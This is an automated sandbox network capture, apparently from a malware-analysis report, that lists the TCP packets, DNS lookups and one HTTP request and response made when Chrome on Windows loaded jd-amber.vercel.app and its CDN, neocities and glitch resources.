                          Jul 9, 2024 11:33:24.434222937 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.435060978 CEST49718443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:33:24.435096025 CEST44349718142.250.185.132192.168.2.7
                          Jul 9, 2024 11:33:24.435343981 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.435373068 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.436244965 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.436440945 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.436455011 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.436532974 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.436810970 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.437258005 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.437339067 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.437444925 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.437467098 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.437670946 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.438160896 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.438214064 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.438298941 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.480499029 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.480506897 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.481069088 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.481080055 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.481106997 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.481139898 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.528166056 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.528296947 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.622375011 CEST49718443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:33:24.847862005 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.847887993 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.847942114 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.848114967 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.848961115 CEST49723443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.848978996 CEST44349723198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852307081 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852329016 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852336884 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852350950 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852359056 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852361917 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852494955 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.852516890 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.852559090 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.854487896 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.854495049 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.854521036 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.854547977 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.854577065 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.854588032 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.854613066 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.854856014 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.856154919 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.856199026 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.856216908 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:24.856252909 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.856321096 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.857471943 CEST49722443192.168.2.7198.51.233.2
                          Jul 9, 2024 11:33:24.857486010 CEST44349722198.51.233.2192.168.2.7
                          Jul 9, 2024 11:33:25.517627954 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:25.517687082 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:25.521840096 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:25.526292086 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:25.526312113 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.267440081 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.298094034 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.298134089 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.302052021 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.302087069 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.304615021 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.306946039 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.307115078 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.307128906 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.307223082 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.425692081 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.425715923 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.526662111 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.818269968 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.818950891 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:26.828537941 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.829222918 CEST49725443192.168.2.799.86.4.12
                          Jul 9, 2024 11:33:26.829248905 CEST4434972599.86.4.12192.168.2.7
                          Jul 9, 2024 11:33:27.124902964 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:27.124959946 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:27.125245094 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:27.125714064 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:27.125737906 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:27.859538078 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:27.926947117 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.153037071 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.153079987 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.154280901 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.154306889 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.158057928 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.165739059 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.165831089 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.165930986 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.207931042 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.207966089 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.248213053 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.320065022 CEST49698443192.168.2.7104.98.116.138
                          Jul 9, 2024 11:33:28.320558071 CEST49729443192.168.2.7104.98.116.138
                          Jul 9, 2024 11:33:28.320605040 CEST44349729104.98.116.138192.168.2.7
                          Jul 9, 2024 11:33:28.321743011 CEST49729443192.168.2.7104.98.116.138
                          Jul 9, 2024 11:33:28.322017908 CEST49729443192.168.2.7104.98.116.138
                          Jul 9, 2024 11:33:28.322031975 CEST44349729104.98.116.138192.168.2.7
                          Jul 9, 2024 11:33:28.325158119 CEST44349698104.98.116.138192.168.2.7
                          Jul 9, 2024 11:33:28.528719902 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.528748989 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.528822899 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.530693054 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.534214973 CEST49727443192.168.2.718.66.102.46
                          Jul 9, 2024 11:33:28.534240007 CEST4434972718.66.102.46192.168.2.7
                          Jul 9, 2024 11:33:28.592456102 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:28.592550993 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:28.594484091 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:28.594710112 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:28.594747066 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.510984898 CEST44349729104.98.116.138192.168.2.7
                          Jul 9, 2024 11:33:29.511012077 CEST44349729104.98.116.138192.168.2.7
                          Jul 9, 2024 11:33:29.511065006 CEST49729443192.168.2.7104.98.116.138
                          Jul 9, 2024 11:33:29.511104107 CEST49729443192.168.2.7104.98.116.138
                          Jul 9, 2024 11:33:29.514065981 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.514334917 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.514368057 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.515748024 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.515849113 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.516195059 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.516303062 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.516345024 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.560501099 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.629184008 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.629204035 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.729469061 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.787098885 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.787147045 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.787194014 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.787225962 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.787312984 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:29.787409067 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.788142920 CEST49730443192.168.2.718.66.102.85
                          Jul 9, 2024 11:33:29.788161993 CEST4434973018.66.102.85192.168.2.7
                          Jul 9, 2024 11:33:34.240638018 CEST44349718142.250.185.132192.168.2.7
                          Jul 9, 2024 11:33:34.240756035 CEST44349718142.250.185.132192.168.2.7
                          Jul 9, 2024 11:33:34.240910053 CEST49718443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:33:34.652070999 CEST49677443192.168.2.720.50.201.200
                          Jul 9, 2024 11:33:34.659210920 CEST49718443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:33:34.659249067 CEST44349718142.250.185.132192.168.2.7
                          Jul 9, 2024 11:33:34.702858925 CEST49705443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:34.703933001 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:34.703973055 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:34.704797029 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:34.705328941 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:34.705338001 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:34.744503021 CEST4434970576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:35.873833895 CEST4434970576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:35.873918056 CEST4434970576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:35.873965025 CEST49705443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:35.878607035 CEST49705443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:35.878628969 CEST4434970576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:36.242650032 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:36.242985964 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:36.243019104 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:36.244314909 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:36.244775057 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:33:36.244962931 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:33:36.296775103 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:34:21.261127949 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:34:21.261177063 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:34:23.641782999 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:23.641843081 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:23.641908884 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:23.642405987 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:23.642421961 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:24.286731958 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:24.286998987 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:24.287034035 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:24.287560940 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:24.288177967 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:24.288290024 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:24.479886055 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:34.179106951 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:34.179174900 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:34.179227114 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:34.624062061 CEST49739443192.168.2.7142.250.185.132
                          Jul 9, 2024 11:34:34.624103069 CEST44349739142.250.185.132192.168.2.7
                          Jul 9, 2024 11:34:36.623852968 CEST49735443192.168.2.776.76.21.93
                          Jul 9, 2024 11:34:36.623979092 CEST4434973576.76.21.93192.168.2.7
                          Jul 9, 2024 11:34:36.624089956 CEST49735443192.168.2.776.76.21.93
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 9, 2024 11:33:19.185666084 CEST123123192.168.2.740.119.148.38
                          Jul 9, 2024 11:33:19.329427958 CEST53501331.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:19.338855028 CEST53561211.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:19.418525934 CEST12312340.119.148.38192.168.2.7
                          Jul 9, 2024 11:33:20.430428028 CEST53580971.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:20.976242065 CEST5044653192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:20.976675034 CEST6194753192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:20.986502886 CEST53619471.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:20.986519098 CEST53504461.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.793520927 CEST4960953192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.793668985 CEST5333653192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.794620037 CEST5307853192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.794763088 CEST5618353192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.795129061 CEST6030353192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.795248032 CEST6132153192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.795603991 CEST6397153192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.795737982 CEST5979353192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:21.800220966 CEST53515161.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.802515984 CEST53530781.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.802813053 CEST53561831.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.803301096 CEST53603031.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.803314924 CEST53613211.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.803931952 CEST53597931.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.804115057 CEST53639711.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.804711103 CEST53496091.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.805820942 CEST53501621.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:21.805831909 CEST53533361.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:23.598371029 CEST5005653192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:23.601392031 CEST6053953192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:23.606327057 CEST53500561.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:23.608284950 CEST53605391.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:23.609879017 CEST53532781.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:23.747857094 CEST53650591.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:23.953499079 CEST5916353192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:23.953871965 CEST5424353192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:23.963640928 CEST53591631.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:23.964730024 CEST53542431.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:25.446813107 CEST5289853192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:25.446990967 CEST6306253192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:25.454667091 CEST53630621.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:25.478780985 CEST53528981.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:26.941217899 CEST6237053192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:26.941533089 CEST5755453192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:27.084599972 CEST53575541.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:27.094856024 CEST53623701.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:28.582134962 CEST5097753192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:28.582323074 CEST6228453192.168.2.71.1.1.1
                          Jul 9, 2024 11:33:28.591221094 CEST53509771.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:28.591237068 CEST53622841.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:37.431199074 CEST53565711.1.1.1192.168.2.7
                          Jul 9, 2024 11:33:56.824522018 CEST53655051.1.1.1192.168.2.7
                          Jul 9, 2024 11:34:11.407413006 CEST138138192.168.2.7192.168.2.255
                          Jul 9, 2024 11:34:19.156032085 CEST53536441.1.1.1192.168.2.7
                          Jul 9, 2024 11:34:19.822185993 CEST53630421.1.1.1192.168.2.7
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 9, 2024 11:33:20.976242065 CEST192.168.2.71.1.1.10x5c98Standard query (0)jd-amber.vercel.appA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:20.976675034 CEST192.168.2.71.1.1.10x11a4Standard query (0)jd-amber.vercel.app65IN (0x0001)false
                          Jul 9, 2024 11:33:21.793520927 CEST192.168.2.71.1.1.10x41c5Standard query (0)asfasfasfasp.neocities.orgA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.793668985 CEST192.168.2.71.1.1.10x1920Standard query (0)asfasfasfasp.neocities.org65IN (0x0001)false
                          Jul 9, 2024 11:33:21.794620037 CEST192.168.2.71.1.1.10x8bf1Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.794763088 CEST192.168.2.71.1.1.10x1782Standard query (0)code.jquery.com65IN (0x0001)false
                          Jul 9, 2024 11:33:21.795129061 CEST192.168.2.71.1.1.10x1891Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.795248032 CEST192.168.2.71.1.1.10x85fbStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                          Jul 9, 2024 11:33:21.795603991 CEST192.168.2.71.1.1.10xf51aStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.795737982 CEST192.168.2.71.1.1.10xf580Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                          Jul 9, 2024 11:33:23.598371029 CEST192.168.2.71.1.1.10xee5aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:23.601392031 CEST192.168.2.71.1.1.10x9d0Standard query (0)www.google.com65IN (0x0001)false
                          Jul 9, 2024 11:33:23.953499079 CEST192.168.2.71.1.1.10x8b7bStandard query (0)asfasfasfasp.neocities.orgA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:23.953871965 CEST192.168.2.71.1.1.10xe02dStandard query (0)asfasfasfasp.neocities.org65IN (0x0001)false
                          Jul 9, 2024 11:33:25.446813107 CEST192.168.2.71.1.1.10xdcc3Standard query (0)cdn.glitch.comA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:25.446990967 CEST192.168.2.71.1.1.10x946aStandard query (0)cdn.glitch.com65IN (0x0001)false
                          Jul 9, 2024 11:33:26.941217899 CEST192.168.2.71.1.1.10x623bStandard query (0)cdn.glitch.meA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:26.941533089 CEST192.168.2.71.1.1.10x936aStandard query (0)cdn.glitch.me65IN (0x0001)false
                          Jul 9, 2024 11:33:28.582134962 CEST192.168.2.71.1.1.10xdf67Standard query (0)cdn.glitch.meA (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:28.582323074 CEST192.168.2.71.1.1.10xda0bStandard query (0)cdn.glitch.me65IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 9, 2024 11:33:20.986519098 CEST1.1.1.1192.168.2.70x5c98No error (0)jd-amber.vercel.app76.76.21.93A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:20.986519098 CEST1.1.1.1192.168.2.70x5c98No error (0)jd-amber.vercel.app76.76.21.61A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.802515984 CEST1.1.1.1192.168.2.70x8bf1No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.802515984 CEST1.1.1.1192.168.2.70x8bf1No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.802515984 CEST1.1.1.1192.168.2.70x8bf1No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.802515984 CEST1.1.1.1192.168.2.70x8bf1No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.803301096 CEST1.1.1.1192.168.2.70x1891No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.803301096 CEST1.1.1.1192.168.2.70x1891No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.803314924 CEST1.1.1.1192.168.2.70x85fbNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                          Jul 9, 2024 11:33:21.803931952 CEST1.1.1.1192.168.2.70xf580No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                          Jul 9, 2024 11:33:21.804115057 CEST1.1.1.1192.168.2.70xf51aNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.804115057 CEST1.1.1.1192.168.2.70xf51aNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:21.804711103 CEST1.1.1.1192.168.2.70x41c5No error (0)asfasfasfasp.neocities.org198.51.233.2A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:23.606327057 CEST1.1.1.1192.168.2.70xee5aNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:23.608284950 CEST1.1.1.1192.168.2.70x9d0No error (0)www.google.com65IN (0x0001)false
                          Jul 9, 2024 11:33:23.963640928 CEST1.1.1.1192.168.2.70x8b7bNo error (0)asfasfasfasp.neocities.org198.51.233.2A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:25.478780985 CEST1.1.1.1192.168.2.70xdcc3No error (0)cdn.glitch.com99.86.4.12A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:25.478780985 CEST1.1.1.1192.168.2.70xdcc3No error (0)cdn.glitch.com99.86.4.109A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:25.478780985 CEST1.1.1.1192.168.2.70xdcc3No error (0)cdn.glitch.com99.86.4.123A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:25.478780985 CEST1.1.1.1192.168.2.70xdcc3No error (0)cdn.glitch.com99.86.4.38A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:27.094856024 CEST1.1.1.1192.168.2.70x623bNo error (0)cdn.glitch.me18.66.102.46A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:27.094856024 CEST1.1.1.1192.168.2.70x623bNo error (0)cdn.glitch.me18.66.102.19A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:27.094856024 CEST1.1.1.1192.168.2.70x623bNo error (0)cdn.glitch.me18.66.102.85A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:27.094856024 CEST1.1.1.1192.168.2.70x623bNo error (0)cdn.glitch.me18.66.102.126A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:28.591221094 CEST1.1.1.1192.168.2.70xdf67No error (0)cdn.glitch.me18.66.102.85A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:28.591221094 CEST1.1.1.1192.168.2.70xdf67No error (0)cdn.glitch.me18.66.102.46A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:28.591221094 CEST1.1.1.1192.168.2.70xdf67No error (0)cdn.glitch.me18.66.102.19A (IP address)IN (0x0001)false
                          Jul 9, 2024 11:33:28.591221094 CEST1.1.1.1192.168.2.70xdf67No error (0)cdn.glitch.me18.66.102.126A (IP address)IN (0x0001)false
                          • jd-amber.vercel.app
                          • https:
                            • cdnjs.cloudflare.com
                            • code.jquery.com
                            • maxcdn.bootstrapcdn.com
                            • asfasfasfasp.neocities.org
                            • cdn.glitch.com
                            • cdn.glitch.me
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.74970476.76.21.934432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:21 UTC662OUTGET / HTTP/1.1
                          Host: jd-amber.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          sec-ch-ua-platform: "Windows"
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-User: ?1
                          Sec-Fetch-Dest: document
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:21 UTC489INHTTP/1.1 200 OK
                          Accept-Ranges: bytes
                          Access-Control-Allow-Origin: *
                          Age: 1649
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Disposition: inline
                          Content-Length: 108547
                          Content-Type: text/html; charset=utf-8
                          Date: Tue, 09 Jul 2024 09:33:21 GMT
                          Etag: "24c5e3908ab5a78f2209cc7da1a0608a"
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Cache: HIT
